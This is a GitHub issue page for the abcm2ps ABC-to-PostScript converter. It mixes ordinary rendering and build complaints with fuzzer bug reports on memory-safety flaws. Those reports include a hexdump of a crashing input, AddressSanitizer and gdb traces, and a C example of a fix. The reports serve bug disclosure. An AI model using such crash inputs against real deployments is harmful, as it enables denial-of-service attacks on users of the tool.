lewdlime / abcm2ps

abcm2ps is a command line program which converts ABC to music sheet in PostScript or SVG format. It is an extension of abc2ps which may handle many voices per staff. abcm2ps is Copyright © 2014-2016 Jean-Francois Moine.

Home Page: http://moinejf.free.fr/

License: GNU General Public License v3.0

Makefile 0.22% C 99.63% PostScript 0.02% HTML 0.13%

abcm2ps's People

Contributors

asarhaddon, helmutg, hkiel, lewdlime, mike-k0, moinejf, nuggetwheat, olets, p3l6, sbeitzel, sgn

abcm2ps's Issues

global buffer overflow draw.c:980 in draw_acc

Reproducer: abcm2ps-global-buffer-overflow-draw.c-draw_acc.abc.zip (SHA1: bd48041d13a2e3f59113e6a119d28a1ecee947ca)
Tested in: 070cfe6
Fuzzing tool used: afl-2.52b

00000000  58 3a 30 0a 54 3a 30 30  24 24 24 24 3e 24 24 24  |X:0.T:00$$$$>$$$|
00000010  24 24 24 24 24 24 24 24  24 24 24 24 24 24 24 24  |$$$$$$$$$$$$$$$$|
00000020  24 24 24 24 0a 4b 3a 47  3d 20 41 32 42 41 30 0a  |$$$$.K:G= A2BA0.|
00000030  20 20 47 41 42 63 20 64  65 64 42 7c 64 65 64 42  |  GABc dedB|dedB|
00000040  20 64 65 64 40 7c 63 32  65 63 20 42 32 64 42 7c  | ded@|c2ec B2dB||
00000050  41 32 46 32 20 47 34 3a  7c 0a 7c 3a 67 32 67 66  |A2F2 G4:|.|:g2gf|
00000060  20 67 64 42 64 7c 67 32  66 32 20 65 32 64 32 7c  | gdBd|g2f2 e2d2||
00000070  63 32 65 63 20 42 32 64  42 7c 63 32 66 7c 0a 20  |c2ec B2dB|c2f|. |
00000080  20 67 32 64 00 00 00 7f                           | g2d....|
00000088
./abcm2ps abcm2ps-global-buffer-overflow-draw.c-draw_acc.abc
abcm2ps-8.13.20 (2018-02-21)
File abcm2ps-global-buffer-overflow-draw.c-draw_acc.abc
abcm2ps-global-buffer-overflow-draw.c-draw_acc.abc:3:4: error: Missing note after accidental
   3 K:G= A2BA0
         ^
abcm2ps-global-buffer-overflow-draw.c-draw_acc.abc:4:20: error: Bad character
   4   GABc dedB|dedB ded@|c2ec B2dB|A2F2 G4:|
                         ^
=================================================================
==8898==ERROR: AddressSanitizer: global-buffer-overflow on address 0x555c6e86c678 at pc 0x555c6e51ba86 bp 0x7fffeadf33e0 sp 0x7fffeadf33d8
READ of size 8 at 0x555c6e86c678 thread T0
    #0 0x555c6e51ba85 in draw_acc /home/hsalo/src/abcm2ps/draw.c:980
    #1 0x555c6e51ba85 in draw_keysig /home/hsalo/src/abcm2ps/draw.c:1143
    #2 0x555c6e51ba85 in draw_symbols /home/hsalo/src/abcm2ps/draw.c:4785
    #3 0x555c6e51ba85 in draw_all_symb /home/hsalo/src/abcm2ps/draw.c:4835
    #4 0x555c6e58805e in output_music /home/hsalo/src/abcm2ps/music.c:5141
    #5 0x555c6e5b3d20 in generate /home/hsalo/src/abcm2ps/parse.c:1039
    #6 0x555c6e5db37c in gen_ly /home/hsalo/src/abcm2ps/parse.c:1060
    #7 0x555c6e5db37c in do_tune /home/hsalo/src/abcm2ps/parse.c:3621
    #8 0x555c6e4599b0 in abc_eof /home/hsalo/src/abcm2ps/abcparse.c:200
    #9 0x555c6e533df8 in frontend /home/hsalo/src/abcm2ps/front.c:905
    #10 0x555c6e451f3e in treat_file /home/hsalo/src/abcm2ps/abcm2ps.c:239
    #11 0x555c6e44e2b6 in main /home/hsalo/src/abcm2ps/abcm2ps.c:1040
    #12 0x7fd7400dd2e0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202e0)
    #13 0x555c6e450649 in _start (/home/hsalo/src/abcm2ps/abcm2ps+0x37649)

0x555c6e86c678 is located 40 bytes to the left of global variable 'yn' defined in 'format.c:479:14' (0x555c6e86c6a0) of size 16
0x555c6e86c678 is located 8 bytes to the right of global variable 'acc_tb' defined in 'draw.c:27:14' (0x555c6e86c640) of size 48
SUMMARY: AddressSanitizer: global-buffer-overflow /home/hsalo/src/abcm2ps/draw.c:980 in draw_acc
Shadow bytes around the buggy address:
  0x0aac0dd05870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0aac0dd05880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0aac0dd05890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0aac0dd058a0: 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 00 00 00 00
  0x0aac0dd058b0: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
=>0x0aac0dd058c0: 00 00 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 f9[f9]
  0x0aac0dd058d0: f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9 00 00 00 00
  0x0aac0dd058e0: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
  0x0aac0dd058f0: 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
  0x0aac0dd05900: 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 f9
  0x0aac0dd05910: f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==8898==ABORTING

Fun fact when running geeqie in Debian stable (stretch 1:1.3-1+b1) for the output SVG:

Thread 1 "geeqie" received signal SIGSEGV, Segmentation fault.
__memmove_sse2_unaligned_erms () at ../sysdeps/x86_64/multiarch/../multiarch/memmove-vec-unaligned-erms.S:301
301	../sysdeps/x86_64/multiarch/../multiarch/memmove-vec-unaligned-erms.S: No such file or directory.
(gdb) bt
#0  __memmove_sse2_unaligned_erms () at ../sysdeps/x86_64/multiarch/../multiarch/memmove-vec-unaligned-erms.S:301
#1  0x00007ffff4c5fd06 in ?? () from /usr/lib/x86_64-linux-gnu/libexiv2.so.14
#2  0x00007ffff4c59375 in Exiv2::PreviewManager::getPreviewImage(Exiv2::PreviewProperties const&) const () from /usr/lib/x86_64-linux-gnu/libexiv2.so.14
#3  0x00007ffff4c6d8f7 in Exiv2::Rw2Image::readMetadata() () from /usr/lib/x86_64-linux-gnu/libexiv2.so.14

Pango errors when generating PostScript (but not SVG)

I'm using abcm2ps 8.13.17 and pango 1.40.14, both installed through Homebrew on Mac OS X 10.12 (Sierra). When I attempt to use abcm2ps to process ABC files containing certain non-ASCII characters (see below for more on which ones), it works perfectly for SVG output, but for PostScript output, abcm2ps crashes with the following error messages:

(process:74759): GLib-GObject-WARNING **: invalid cast from 'PangoCairoCoreTextFont' to 'PangoFcFont'

(process:74759): Pango-CRITICAL **: pango_fc_font_lock_face: assertion 'PANGO_IS_FC_FONT (font)' failed
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35
warning: freetype error 35

(process:74759): Pango-CRITICAL **: pango_fc_font_unlock_face: assertion 'PANGO_IS_FC_FONT (font)' failed

The characters that can trigger this error include U+2019 RIGHT SINGLE QUOTATION MARK and U+2014 EM DASH, as well as letters from non-Roman scripts such as Cyrillic, but not × U+00D7 MULTIPLICATION SIGN. I've tried turning off Pango with the --pango 0 option, but while that prevents the crash, it also means that these characters don't show up in the output. Help?

unicode quotes notdef for postscript

My abc file has unicode apostrophe and quotes in the words but abcm2ps is returning notdef in both ps and eps output. How do I go about getting it to work with ps/eps?

Missing diagrams when using %%chordnames

When using diagram in conjunction with chordnames, diagrams for chords that no longer use common English notation are not shown.

X:1
%%chordnames C,D,E,F,G,A,H % German
%%diagram 1
K:C
V:1 treble
"C"C "D"D "E"E "F"F "G"G "A"A "B"B "C"c


Null pointer dereference vulnerability in the function get_user()

Tested environment : 64-bit ubuntu 16.04 LTS

Affected version : 8.14.1-master

Command :
./abcm2ps r -E -g -x -v -O fff -O = -i -k 1 $POC -s 10 -w 1 -m 100 -d 100 -a 0 -f musicfont.fmt -D Bar/ -p -l -I 500 -x -M -N 3 -1 -G -j 0 -b 1 -f -T all -c -B 10

Vulnerable code :

value = parse.deco_tb[s->u.user.value - 128];
if (strcmp(value, "beambreak") == 0)
char_tb[c] = CHAR_SPAC;

Debug:

GDB :

In function get_user() in abcparse.c

		value = parse.deco_tb[s->u.user.value - 128];
		if (strcmp(value, "beambreak") == 0)
   	 		char_tb[c] = CHAR_SPAC;
   	 	else if (strcmp(value, "ignore") == 0)
   	 		char_tb[c] = CHAR_IGN;
  	 	else if (strcmp(value, "nil") == 0
   	 	      || strcmp(value, "none") == 0)
────────────────────────────────────────────────────────────────────────────────────────────────────────
[#0] Id 1, Name: "abcm2ps", stopped, reason: SIGSEGV
────────────────────────────────────────────────────────────────────────────────────────────────────────
[#0] 0x55555555dbdb → get_user(p=0x5555557f4a27 "tenu", s=0x55555580da68)
[#1] 0x55555555fb7b → parse_info(p=0x5555557f4a22 "M = !tenu")
[#2] 0x555555561edd → parse_line(p=0x5555557f4a20 "U:M = !tenu")
[#3] 0x555555561edd → abc_parse(p=0x5555557f4a20 "U:M = !tenu", fname=0x5555557f39f0 "POC", ln=0x3)
[#4] 0x555555579a54 → txt_add_eos(fname=0x5555557f39f0 "POC", linenum=0x3)
[#5] 0x555555579ee4 → frontend(s=<optimized out>, ftype=<optimized out>, fname=<optimized out>, linenum=<optimized out>)
[#6] 0x55555555ce2d → treat_file(fn=0x7fffffffe26a "POC", ext=<optimized out>)
[#7] 0x55555555b9e1 → main(argc=0x17, argv=0x7fffffffde38)
gef➤  p parse.deco_tb
$1 = {0x0 <repeats 128 times>}
gef➤  ptype value
type = char *
gef➤  p value
$2 = 0x0
gef➤  i r
rax            0x0	0x0
rbx            0x5555557f4a27	0x5555557f4a27
rcx            0xa	0xa
rdx            0x5555557c49a0	0x5555557c49a0
rsi            0x0	0x0
rdi            0x5555555a3005	0x5555555a3005
rbp            0x4d	0x4d
rsp            0x7fffffffd850	0x7fffffffd850
r8             0xe	0xe
r9             0x1	0x1
r10            0xc	0xc
r11            0x246	0x246
r12            0x55555580da68	0x55555580da68
r13            0x5555557b5060	0x5555557b5060
r14            0x55555580fb9e	0x55555580fb9e
r15            0x0	0x0
rip            0x55555555dbdb	0x55555555dbdb <get_user+203>
eflags         0x10282	[ SF IF RF ]
cs             0x33	0x33
ss             0x2b	0x2b
ds             0x0	0x0
es             0x0	0x0
fs             0x0	0x0
gs             0x0	0x0

Reproducer file - Reproducer
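The crash above comes from passing a NULL table entry straight into strcmp. As an added example (not abcm2ps code), the following C shows the unchecked lookup in the shape the report quotes next to a checked version that validates the index range and the empty slot first. The table size, the 128 offset and the names deco_tb, classify_unchecked and classify_checked are assumptions for illustration; the one-registered-slot table is constructed to mirror the "0x0 <repeats 128 times>" the gdb session shows.

```c
#include <stdio.h>
#include <string.h>

#define DECO_TB_SIZE    128   /* hypothetical size; matches the 128 NULL slots gdb printed */
#define USER_VALUE_BASE 128   /* user symbols stored as 128 + slot, as in the quoted expression */

enum char_class { CHAR_NOTE = 0, CHAR_SPAC = 1, CHAR_IGN = 2, CHAR_BAD = 3 };

/* Constructed decoration table: one slot registered, every other slot NULL. */
static const char *deco_tb[DECO_TB_SIZE] = { [3] = "beambreak" };

/* Unchecked form, same shape as the code quoted in the report: when the slot
 * was never registered, value is NULL and strcmp dereferences it. */
static enum char_class classify_unchecked(int user_value)
{
    const char *value = deco_tb[user_value - USER_VALUE_BASE];
    if (strcmp(value, "beambreak") == 0)
        return CHAR_SPAC;
    if (strcmp(value, "ignore") == 0)
        return CHAR_IGN;
    return CHAR_NOTE;
}

/* Checked form: reject an out-of-range index, then an empty slot, before the
 * string is used. CHAR_BAD lets the caller report "decoration not defined". */
static enum char_class classify_checked(int user_value)
{
    int idx = user_value - USER_VALUE_BASE;
    const char *value;

    if (idx < 0 || idx >= DECO_TB_SIZE)
        return CHAR_BAD;
    value = deco_tb[idx];
    if (value == NULL)
        return CHAR_BAD;
    if (strcmp(value, "beambreak") == 0)
        return CHAR_SPAC;
    if (strcmp(value, "ignore") == 0)
        return CHAR_IGN;
    return CHAR_NOTE;
}

int main(void)
{
    /* slot 3 is registered, slot 5 is not, slot 300 is outside the table */
    printf("unchecked, registered slot: %d\n", classify_unchecked(USER_VALUE_BASE + 3));
    printf("checked, registered slot:   %d\n", classify_checked(USER_VALUE_BASE + 3));
    printf("checked, undefined slot:    %d\n", classify_checked(USER_VALUE_BASE + 5));
    printf("checked, out of range:      %d\n", classify_checked(USER_VALUE_BASE + 300));
    return 0;
}
```

The checked form returns a distinct result instead of guessing a default, so the parser can emit the same "not defined" diagnostic it already prints for unknown decorations rather than dereferencing NULL.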

8va show error, Ped and ✲ show direction error

This ABC, parsed to SVG, gives an 8va error, and Ped and ✲ show a direction error: they are left and right, not top and bottom:

X:1
T:lxq
Z:?
%%scale 0.85
%%pagewidth 21.00cm
%%leftmargin 1.89cm
%%rightmargin 1.26cm
%%score { 1 | 2 }
L:1/4
Q:1/4=176
M:4/4
I:linebreak $
K:C
V:1 treble nm="MusicXML Part"
L:1/16
V:2 bass
V:1
"^Allegro()""^legato"!f! !1!z[I:staff +1] C,"_2"G,"_4"C"^5""^1"[I:staff -1] !>!ECGc"^2""^4""^5" !>!ecgc'!8va(! !>!e'c'g'c'' | %1
!>!e''c''g'c'!8va)! !>!e'c'gc !>!ecGC !>!EC[I:staff +1]G,C, |$ %2
[I:staff -1] !1!z[I:staff +1] C,"_2"A,!3!C"^5"[I:staff -1] F"^1"C"^2"A!3!c fcac'!8va(! f'c'a'c'' | %3
"^5" e''"^4"c''"^2"a'"^1"c'!8va)!"^5" e'c'ac ecAC !>!DC[I:staff +1]A,C, | %4
[I:staff -1] z[I:staff +1] B,,G,!4!B,"^5"[I:staff -1] DB,GB dBgb d'!8va(!bg'a' |$ %5
"^5" d''"^3"a'"^2"^f'"^1"c'!8va)!"^5" d'"^3"a"^2"^f"^1"c dA^FC D[I:staff +1]A,^F,C, | %6
[I:staff -1] z[I:staff +1] !1!C,!2!=F,"_3"_A,"^5"[I:staff -1] D"^1"CF_A dcf_a!8va(! d'c'f'_a' |$ %7
"^5" d''"^3"g'"^2"f'"^1"b!8va)!"^5" d'gfB dGFB,"^5" !>!^D[I:staff +1]G,F,B,, | %8
[I:staff -1] z[I:staff +1] C,G,C[I:staff -1] ECGc ecgc'!8va(! e'c'g'c'' |$ %9
e''c''g'c'!8va)! e'c'gc ecGC EC[I:staff +1]G,C, | %10
[I:staff -1] z[I:staff +1] !1!C,!2!F,!4!C[I:staff -1] !5!F!1!C!2!F!4!c !5!fcfc'!8va(! f'c'f'c'' |$ %11
"^5" e''"^4"c''"^2"^f'"^1"c'!8va)!"^5" e'c'^fc ec^FC EC[I:staff +1]^F,C, | %12
[I:staff -1] z[I:staff +1] !1!C,!2!G,!4!C"^5"[I:staff -1] DCGc dcgc'!8va(! d'c'g'c'' | %13
d''b'g'b!8va)! d'bgB dBGB, DB,[I:staff +1]G,B,, |$ %14
[I:staff -1] z[I:staff +1] !1!D,!2!G,!4!D"^5"[I:staff -1] EDGd edgd'!8va(! e'd'g'd'' | %15
"^5" e''"^4"c''"^2"g'"_1"c'!8va)!"^5" e'c'gc ecGC EC[I:staff +1]G,C, |$ %16
[I:staff -1] z[I:staff +1] !1!E,!2!C[I:staff -1]!4!E"^5" FEce fec'e'!8va(! f'e'c''e'' | %17
"^5" f''"^4"d''"^2"b'"^1"d'!8va)!"^5" f'd'bd fdBD FDB,[I:staff +1]D, |$ %18
[I:staff -1] z[I:staff +1] !1!D,!2!B,!4!D"^5"[I:staff -1] E"^1"DBd edbd'!8va(! e'd'b'd'' | %19
"^5" e''"^4"c''"^2"a'"_1"c'!8va)!"^5" e'c'ac ecAC EC[I:staff +1]A,C, |$ %20
[I:staff -1] z[I:staff +1] !1!C,!2!A,!4!C"^5"[I:staff -1] E"^1"CAc ecac' e'!8va(!c'a'c'' | %21
!5!^d''!3!!4!b'!2!!3!a'!1!b!8va)! !5!^d'!3!!4!b!2!!3!a!1!B ^dBAB, ^D[I:staff +1]B,A,B,, | %22
[I:staff -1] z[I:staff +1] !1!B,,!2!A,!3!B,"_5"[I:staff -1] E"_1"B,!2!A!3!B !5!eBab e'!8va(!ba'b' |$ %23
"^5" e''"^3"b'"^2"^g'"^1"!8va)!b"^5" e'"^3"b^gB eB^GB, EB,[I:staff +1]^G,B,, | %24
[I:staff -1] z[I:staff +1] !1!E,!2!A,!3!^C[I:staff -1] !5!=GEA^c gea^c' g'c'ae | %25
"^5" g'"^3"=c'"^2"a"^1"e"^5" gcAE GC[I:staff +1]A,E,[I:staff -1] ^FC[I:staff +1]A,D, |$ %26
[I:staff -1] z[I:staff +1] !1!D,!2!G,!3!C[I:staff -1] !5!=FDGc fdgc'!8va(! f'd'g'c'' | %27
"^5" f''"^3"b'"^2"g'"_1"d'!8va)!"^5" f'bgd fBGD F[I:staff +1]B,G,D, | %28
[I:staff -1] z[I:staff +1] !1!C,!2!G,!3!_B,[I:staff -1] !5!E!1!C!2!G!3!_B !5!ecg_b!8va(! e'c'g'c'' |$ %29
"^5" _e''!3!!4!_b'"^2"_e'"_1"c'!8va)!"^5" _e'_b_ec e_B_EC E_B,[I:staff +1]_E,C, | %30
[I:staff -1] z[I:staff +1] !1!C,!2!_E,!3!A,[I:staff -1] !5!_ECEA _ecea!8va(! _e'c'e'a' |$ %31
"^5" _e''"^3"_a'"^2"_e'"_1"!8va)!_c'"^5" _e'_a_e_c e_A_E_C E[I:staff +1]_A,_E,_C, | %32
[I:staff -1] z[I:staff +1] !1!_B,,!2!F,!3!_A,[I:staff -1] !5!=D!1!_B,F_A"_cresc." dBf_a!8va(! d'_bf'_a' |$ %33
"^5" d''"^3"^g'"^2"=e'"_1"!8va)!_b"^5" d'^g=e_B d^GE_B, D[I:staff +1]^G,E,_B,, | %34
[I:staff -1] z[I:staff +1] !1!A,,!2!E,!4!A,[I:staff -1] !5!^CA,EA ^cAea!8va(! ^c'ae'a' |$ %35
^c''a'e'a!8va)!"_dim." ^c'aeA ^cAEA, ^C[I:staff +1]A,E,A,, | %36
[I:staff -1] z[I:staff +1] !1!A,,!2!D,!3!^F,"^5"[I:staff -1] =CA,D^F cAd^f c'ad'^f' |$ %37
"^5"!8va(! c''"^3"=f'"^2"d'"_1"g!8va)!"^5" c'fdG cFD[I:staff +1]G, !>!B,F,D,G,, | %38
[I:staff -1] !1!z[I:staff +1] !2!!3!G,,C,E,"_5" B,G,[I:staff -1]CE BGce bgc'e' | %39
"^5" b'"^3"e'"^2"c'"^1"f"^5" becF BEC[I:staff +1]F, !>!A,E,C,F,, |$ %40
[I:staff -1] z[I:staff +1] !1!F,,!2!B,,!3!D,"_5" A,F,B,[I:staff -1]D AFBd afbd' | %41
g'd'be gdB"^1"E"_cresc.""^2" A"^3"c"^5"g"^1"e ac'g'"^4"e' | %42
"^5" f'"^3"c'"^2"a"^1"d"^5" fcA"^1"D"^2" G"^3"B"^5"f"^1"d gbf'"^4"d' |$ %43
"^5" e'"^3"b"^2"g"_1"c"^5" eBGC FAec fae'c' | %44
!f!"^5" d'"^3"a"^2"f"^1"B dAFB, D[I:staff +1]A,F,B,,[I:staff -1] z4 | %45
^d'a^fB ^dA^FB, ^D[I:staff +1]A,^F,B,,[I:staff -1] z4 |$ %46
z[I:staff +1] !1!B,,!2!E,!3!^G,"^5"[I:staff -1] E"^1"B,E^G eBe^g!8va(! e'be'^g' | %47
"^5" e''"^3"^g'"^2"e'"^1"b!8va)!"^5" e'"_dim."^geB e^GEB, !>!=FB,[I:staff +1]=G,D, |$ %48
[I:staff -1] z[I:staff +1] !1!C,!2!G,!4!C"^5"[I:staff -1] ECGc ecgc'!8va(! e'c'g'c'' | %49
e''c''g'c'!8va)! e'c'gc ecGC EC[I:staff +1]G,C, | %50
[I:staff -1] z[I:staff +1] !1!C,!2!A,!4!C[I:staff -1] FCAc fcac'!8va(! f'c'a'c'' |$ %51
e''c''a'c'!8va)! e'c'ac ecAC !>!DC[I:staff +1]A,C, | %52
[I:staff -1] z[I:staff +1] B,,G,B,[I:staff -1] DB,GB dBgb!8va(! d'bg'a' | %53
d''a'^f'c'!8va)! d'a^fc dA^FC D[I:staff +1]A,^F,C, |$ %54
[I:staff -1] z[I:staff +1] !1!C,!2!=F,"_3"_A,"^5"[I:staff -1] D"^1"CF_A dcf_a!8va(! d'c'f'_a' | %55
d''g'f'b!8va)! d'gfB dGFB, !>!^D[I:staff +1]G,F,B,, | %56
[I:staff -1] z[I:staff +1] C,G,C[I:staff -1] ECGc ecgc'!8va(! e'c'g'c'' |$ %57
e''c''g'c'!8va)! e'c'gc ecGC EC[I:staff +1]G,C, | %58
[I:staff -1] z[I:staff +1] !1!C,!2!F,!4!C[I:staff -1] !5!F!1!CFc fcfc'!8va(! f'c'f'c'' | %59
e''c''^f'c'!8va)! e'c'^fc _ec^FC !>!_EC[I:staff +1]^F,C, |$ %60
[I:staff -1] z[I:staff +1] !1!C,!2!G,!4!C"^5"[I:staff -1] DCGc dcgc'!8va(! d'c'g'c'' | %61
"^5" d''"^4"b'"^2"g'"^1"b!8va)! d'bgB dBGB, DB,[I:staff +1]G,B,, | %62
[I:staff -1] z[I:staff +1] !1!C,"_2"A,"_4"C"^5"[I:staff -1] DCAc dcac' d'!8va(!c'a'c'' |$ %63
"^5" _e''"^4"c''"^2"a'"^1"c'!8va)!"^5" _e'"^4"c'ac"^5" !>!^d!3!!4!BA"^2""^1"B,"^5" !>!^D"^3"B,[I:staff +1]A,B,, | %64
[I:staff -1] z[I:staff +1] !1!B,,!2!!3!^G,B,"^5"[I:staff -1] E!1!B,"^2"^G"^3"B"^5" eA^gb e!8va(!b^g'b' | %65
"^5" e''"^3"b'"^2"^g'"^1"b!8va)! e'b^gB eB^GB, EB,[I:staff +1]^G,B,, |$ %66
[I:staff -1] z"_1"[I:staff +1] D,!2!A,!3!C"^5"[I:staff -1] FDAc fdac'!8va(! f'd'a'c'' | %67
"_5" f''"_3"b'"_2"g'"_1"d'!8va)! f'bgd fBGD FB,[I:staff +1]G,D, | %68
[I:staff -1] z"_1"[I:staff +1] C,!2!G,!4!C"_5"[I:staff -1] E!1!CGc"_cresc." ec_bc' !>!!5!g'c'be |$ %69
"^5" !>!^f'"^3"c'"^2"a"^1"_e"^5" !>!^fcA_E !>!=fB_AD !>!=FB,[I:staff +1]_A,D, | %70
[I:staff -1] z[I:staff +1] !1!C,!2!G,!4!C[I:staff -1] !5!ECGc ecgc' ecgc' | %71
"^5"!>(! _e'"^3"a"^2"^f"^1"c"^5" _eA^FC!>)! d_A=FB, D[I:staff +1]_A,F,B,, |$ %72
[I:staff -1] z[I:staff +1] !1!_B,,!2!=E,!3!G,"_5"[I:staff -1] _D"^1"_B,EG _d_Beg!8va(! _d'_be'g' | %73
"_5" _d''"_3"^f'"_2"_e'"_1"a!8va)!"_5"!>(! _d'^f_eA _d^F!>)!_EA, cFEA, |$ %74
z"^1" _A,"^2"=D"^3"=F"^5" c_A=df c'_ad'f' c''f'd'a | %75
"^5" b'"^3"f'"^2"d'"^1"g"_dim.""^5" bfdG BFD[I:staff +1]G, B,F,D,G,, |$ %76
[I:staff -1] z[I:staff +1] !1!G,,!2!E,!3!G, !5!CG,[I:staff -1]EG!<(! cGeg!8va(! c'ge'!<)!g' | %77
!>(! c''g'e'g!8va)! c'geG cGE!>)![I:staff +1]G, CG,E,G,, |[I:staff -1] !fermata!z16 |] %79
V:2
!ped! [C,,C,]4- | [C,,C,]4!ped-up! |$!ped! [F,,,F,,]4 |!ped!!ped-up! [^F,,,^F,,]4 | %4
([G,,,G,,]2 [^F,,,^F,,] [E,,,E,,] |$!ped! [D,,,D,,]4) | [G,,,G,,]4- |$!ped!!ped-up! [G,,,G,,]4 | %8
!ped! [C,,C,]4-!ped-up! |$!ped! [C,,C,]4!ped-up! |!ped!!ped-up! [A,,,A,,]4- |$!ped! [A,,,A,,]4 | %12
!ped-up!!ped! [G,,,G,,]4- |!ped!!ped-up! [G,,,G,,]4 |$ [C,,C,]4- |!ped! [C,,C,]4!ped-up! |$ %16
!ped! [A,,,A,,]4 |!ped! [B,,,B,,]2 [A,,,A,,]2!ped-up! |$!ped! [^G,,,^G,,]4 | %19
!ped!!ped-up! [A,,,A,,]2 [=G,,,=G,,]2 |$ [F,,,F,,]4- |!ped! [F,,,F,,]4!ped-up! | %22
!ped!!ped-up! [E,,,E,,]4- |$!ped! [E,,,E,,]4!ped-up! |!ped! [A,,,A,,]4 |!ped!!ped-up! [D,,D,]4 |$ %26
[G,,,G,,]4- |!ped! [G,,,G,,]4!ped-up! | x4!ped!!ped-up! |$!ped! [_G,,,_G,,]4 | %30
!ped-up!!ped! [F,,,F,,]4!ped-up! |$!ped! [_C,,_C,]4 |!f!!ped!!ped-up! _B,,,4- |$ %33
!ped! [_B,,,_B,,]4!ped-up! |!f!!ped!!ped-up! [A,,,A,,]4- |$!ped! [A,,,A,,]4 |!ped!!ped-up! D,,4 |$ %37
!ped! [G,,,G,,]4!ped-up! |!ped!!ped-up! C,,4 |!ped!!ped-up! [F,,,F,,]4 |$!ped! B,,,4!ped-up! | %41
!ped!!ped-up! [E,,,E,,]2!ped-up!!ped! [A,,,A,,]2 | %42
!ped!!ped-up! [D,,,D,,]2!ped!!ped-up! [G,,,G,,]2 |$ %43
!ped! [C,,,C,,]2!ped-up!!ped! [F,,,F,,]2!ped-up! |!ped!!ped-up! [B,,,B,,]3 B,,,- | %45
!ped! [B,,,B,,]3!ped-up! B,,, |$ [E,,,E,,]4- | %47
!ped! [E,,,E,,]3!ped-up!!>(!!ped-up!!ped! [D,,,D,,]!>)! |$!ped! [C,,,C,,-]4!ped-up! | [C,,C,]4 | %50
!ped!!ped-up! [F,,,F,,]4 |$!ped-up!!ped! [^F,,,^F,,]4 | %52
!ped-up!!ped! ([G,,,G,,]2 [^F,,,^F,,] [E,,,E,,] |!ped! [D,,,D,,]4)!ped-up! |$!ped! [G,,,G,,]4- | %55
!ped!!ped-up! [G,,,G,,]4 |!ped!!ped-up! [C,,C,]4- |$ [C,,C,]4 |!ped!!ped-up! [A,,,A,,]4- | %59
!ped-up!!ped! [A,,,A,,]3!ped! [_A,,,_A,,] |$!ped-up!!ped! [G,,,G,,]4- |!ped!!ped-up! [G,,,G,,]4 | %62
!ped!!ped-up! [^F,,,^F,,]4 |$!ped! [=F,,,=F,,]4!ped-up!!ped! |!ped! [E,,,E,,-]4!ped-up! | %65
[E,,E,]4 |$!ped! D,,4!ped-up! |!ped!!ped-up! [G,,,G,,]4 |!ped!!ped-up! C,,4- |$ %69
!ped! [C,,C,]4!ped-up!!ped! |!ped! C,,4!<(!!<)! |!ped!!ped-up! [G,,,G,,]4!ped!!ped-up! |$ %72
!ped! [G,,,G,,]4-!ped-up! |!ped!!ped-up! [G,,,G,,]4 |$!ped! [G,,,G,,]4-!ped-up!!<(!!<)! | %75
!ped!!ped-up! [B,,,G,,]4!>(!!>)! |$ [C,,,C,,]4- | [C,,,C,,]4 | !fermata![C,,,C,,]4 |] %79

Missing files for compilation

Hi leesavide,

A big thanks for maintaining git versioning for abc tools.

However I was not able to compile abcm2ps from the cloned repo.

Comparing with the contents of abcm2ps-8.13.1.tar.gz, there were two missing files:

  • Makefile.in
  • config.h.in

Actually they were excluded in your .gitignore file (a bit bulky to my taste if I may say).
Also, maybe Makefile should not be versioned since it is generated, but it is included in the official source, so I left it in.

Here is my proposed patch (git diff):
compilable.patch.txt

Hope this helps

Memory access violation in draw.c:352

Hi,

I'm hitting this bug in the latest version of abcm2ps (abcm2ps-8.13.21 (2018-05-05))

valgrind ./abcm2ps report2.abc 
==17297== Memcheck, a memory error detector
==17297== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
==17297== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info
==17297== Command: ./abcm2ps report2.abc
==17297== 
abcm2ps-8.13.21 (2018-05-05)
File report2.abc
report2.abc:127:20: error: Invalid note duration
report2.abc:127:20: error: Note too much dotted
report2.abc:127:20: error: Invalid note duration
report2.abc:127:20: error: Note too much dotted
==17297== Invalid read of size 4
==17297==    at 0x4123B0: calculate_beam (draw.c:352)
==17297==    by 0x418F3C: draw_sym_near (draw.c:4097)
==17297==    by 0x4295CB: delayed_output (music.c:5085)
==17297==    by 0x4295CB: output_music (music.c:5140)
==17297==    by 0x42E1F0: generate (parse.c:1039)
==17297==    by 0x42E877: gen_ly (parse.c:1060)
==17297==    by 0x43433F: do_tune (parse.c:3621)
==17297==    by 0x405488: abc_eof (abcparse.c:200)
==17297==    by 0x41FA44: frontend (front.c:905)
==17297==    by 0x403FAC: treat_file (abcm2ps.c:239)
